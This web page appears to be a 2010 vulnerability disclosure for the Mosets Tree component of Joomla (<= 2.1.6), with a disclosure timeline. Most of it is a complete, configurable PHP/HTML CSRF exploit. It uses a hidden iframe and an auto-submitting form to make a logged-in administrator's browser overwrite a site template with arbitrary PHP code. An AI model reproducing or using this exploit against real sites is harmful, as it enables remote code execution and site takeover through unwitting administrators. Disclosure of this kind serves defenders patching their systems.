Thursday, 18 November 2010 13:06

Moset's Tree <= 2.1.6 for Joomla! does not use anti-CSRF tokens in its admin forms.

Successful exploitation of this exploit requires the admin to be logged in & visit a malicious URL.

<?php
/**
 * Mosets Tree 2.1.6 Template Overwrite CSRF
 * 3 October 2010
 * jdc
 * 
 * How it works - admin template form has no nonce
 * How to exploit - get a logged in admin to click the wrong link ;)
 */
// change these
$target = 'http://localhost/joom';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
  'pagecontent' => $exploit,
  'template' => 'm2',
  'option' => 'com_mtree',
  'task' => 'save_templatepage',
  'page' => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>" name="<?php echo $k; ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>

Timeline

  • Vulnerabilities Discovered: 3 October 2010
  • Vendor Notified: 3 October 2010
  • Vendor Response: 4 October 2010
  • Update Available: ??? 2010
  • Disclosure: 18 November 2010
Last Updated on Thursday, 18 November 2010 13:13
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

Featured Extensions

$3.00
FREE
You Save: $3.00
$5.00
FREE
You Save: $5.00
$1.00
FREE
You Save: $1.00
$3.00
FREE
You Save: $3.00

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions